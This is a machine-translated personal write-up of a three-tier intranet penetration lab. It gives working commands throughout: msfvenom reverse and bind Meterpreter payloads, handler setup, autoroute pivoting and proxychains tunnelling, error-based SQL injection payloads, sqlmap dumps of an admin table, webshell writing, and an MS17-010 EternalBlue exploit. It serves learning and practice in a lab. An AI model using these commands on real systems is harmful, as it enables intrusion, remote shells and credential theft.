tips: after downloading the shooting range, you need to configure the network card, IP, etc. to ensure the three-tier Intranet environment
The shooting range penetrates the intranet layer by layer from the WEB level, mainly to learn ideas and lay a good foundation for future intranet penetration
The topology is as follows:
Excerpt from brother Di's hhh
Penetration test
Target1:
Probe target - exploit WEB vulnerability (TP5_RCE) - get webshell permission - get Flag-Target2
Information collection:
Use nmap to scan ports
(I don't configure the IP in the topology here, so I can configure the IP by myself.)
nmap -sV -p 1-65535 -T4 192.168.153.135
If you are prompted that the site is not built, you need to configure it in the background of the pagoda. The environment building tutorials are
Access the scanned port 80, (public directory)
target1(thinkphp5 build)
Go directly to exp or tools (convenient and fast / mind you can manually)
The payload is automatically generated, and the back door connection address is very intimate. The password is also given
Just connect the ant sword and successfully obtain the shell+flag
Or use EXP published online
It's also very considerate. payload, the database also comes out, and it's convenient to generate files with one click
Intranet horizontal
Go directly to MSF,
1. Generate MSF backdoor (IP, port changes by itself)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your:ip LPORT=1111 -f elf >t1.elf
2. Set monitoring
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST your:ip set LPORT 1111 exploit
Upload the generated Trojan horse with ant sword and execute it. If the permission is not enough, chmod+x can be used
After execution, you can see that the shell has bounced back and continue the subsequent penetration
Intranet agent
Information collection and configuration access
Get network interface: run get_local_subnets View routing address: run autoroute -p Add routing address: run autoroute -s 192.168.22.0/24
Get network interface: get three network segments
Check the routing address: not added yet
Add 22 network segment routing address:
After adding, you can see the routing address. After adding, you can use MSFping to connect to the 22 network segment (only based on the MSF session can communicate)
The route has been added, but only the returned shell can access the intranet target in segment 22;
tips: only based on the shell received by MSF, you can access tong22 network segment. Please understand by yourself
The current session is session1, which is built on the shell of Target1. After the route is established, it can communicate with network segment 22. So we want to use tools to attack the 22 network segment through session1. What should we do at this time?
(in order to solve this situation, we can open an agent locally (there is a module on msf that can open an agent). Through this agent, we can give others a port to connect, and then we can use our own machine (our own computer, not the attacker kali) to connect to kali's port, so that we can access 192.168.22.129.)
You can use sock4+proxychains4 agent to get through the intranet
background Save what you got shell Session, hidden to background use auxiliary/server/socks_proxy set SRVHOST 0.0.0.0 set SRVPORT 1080 exploit
Under linux system, the local proxy interface can be used for access
tips: the configuration file must be modified, otherwise it cannot be received
vim /etc/proxychains4.conf
Modify the configuration information at the end of the file
It is impossible to scan the 192.168.22.0 network segment with nmap directly in kali. It will show that it is not found
You need to add the newly configured agent file to scan
proxychains4 nmap -Pn -sT 192.168.22.0/24 proxychains4 nmap -Pn -sT 192.168.22.129
Under windows, you can install a SocksCap64 or Proxifier to set the agent
Just add the tools you want to use
If the browser wants to access the 22 network segment, it is also very simple. Just configure the network
Successful access to 22 network segment, another wave of information collection
After port scanning, check port 80 and find myna CMS
Run a wave of background targets. I use dirb/dirsearc
Discover robots directory
Find similar background, visit and try
After successfully accessing the background and trying to explode without success, check the source code of the website and find the SQL injection point
Manual error injection
index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+
Table name:
index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+
Finally, the data burst:
md5 decrypts and obtains the background account password admin 123qwe
Login background http://url/index.php?r=admini/default/index
Or SQLmap runs a wave
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword –dbs proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms –tables proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin –columns proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password –dump
Log in to the background and take down the flag
Content template found, try to write to shell
Use AntSword to set the proxy connection shell, and ant sword has its own proxy function
After getting the shell
Continue to pass the horse to get the shell at msf, but the target is in the 192.168.22.0 network segment. We can't connect it actively, so we need to connect it forward here, and msf can connect it
Generate forward backdoor
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf
msf forward connection
background use exploit/multi/handler set payload linux/x64/meterpreter/bind_tcp set rhost 192.168.22.129 set LPORT 3333 exploit
It is still the old step, information collection + configuration access
Get network interface: run get_local_subnets Add routing address: run autoroute -s 192.168.33.0/24 View routing address: run autoroute -p
Continue to scan 33 network segments with proxy
proxychains4 nmap -Pn -sT 192.168.33.33
I found that this is a Windows system with ports 445 and 3389 open. Try using eternal blue
use exploit/windows/smb/ms17_010_psexec set payload windows/meterpreter/bind_tcp set RHOST 192.168.33.33 options run
After you get the session, you can execute the system command casually. Here the shell is garbled. You can enter chcp 65001 to modify the code, which is good
shell net user
Search flag
cd / dir /S *flag* /B type C:\Windows\System32\config\flag.txt # /B displays the name of the folder or file # /S displays the files in the specified directory and all subdirectories. # dir /S /B *flag*
Finally, you can check the type
So far, three flag s have been successfully won
summary
1, It may be that the environment is not configured well, which leads to the fact that my local machine and kali can connect to three target machines. emmmm has not found the reason, and the network card is not working. I don't understand why it can work (pretend that he doesn't work hhhhhh)
2, target2 didn't fully understand the meaning of forward agency when playing target3
3, Summarize the attack process, find the 80 port open ThinkPHP through the IP information collection port, use EXP to successfully get the shell of Target1, use MSF to generate a horse and upload it to the host of Target1 for execution, kali to listen, start collecting information after receiving the session, and add the route of 22 network segments. linux uses its own proxy tool proxychains4 for proxy communication, and other tools can be used to scan 22 network segments, You can also use the windows tool proxifier/sockscap to scan the 22 network segments. You can scan the IP of the 22 network segments through the proxy tool and find the open port 80. You can visit the myna CMS. You can scan the directory and find the background path in the robots directory. The attempt to blast failed. You can audit the web source code and find that the injection point is indicated. SQLmap or manually run a wave of background account passwords to log in. The background interface finds that the template function point can be written to the shell, Use the ant sword to connect, successfully win the shell of target2, use target2 as a springboard to attack target3, and use the forward proxy to generate a horse. (my general understanding is that the shell session of target2 obtained through MSF continues to play target3,) generate a forward and backward door, and use MSF to connect forward, (personal understanding: it is equivalent to that we have obtained the shell of target2, and the horse is generated through the shell session of target2 to attack target3, because the session of 2 has established a route, and MSF can access 33 network segments). Information collection information of tatget3 is found to open port 445/3389, and try to use ms17010 for direct attack (or attack based on the shell session of target2). The shell is successfully obtained through ms17010, which is over
4, Don't just limit yourself to msf. Indeed, we have to learn how to use other tools later, such as CS, ladon and other common tools in the market
5, The main thing is to learn an idea to lay a good foundation for future intranet penetration. Some of them still have no idea. emmmm feels that the difficulty of Intranet is much higher than that of WEB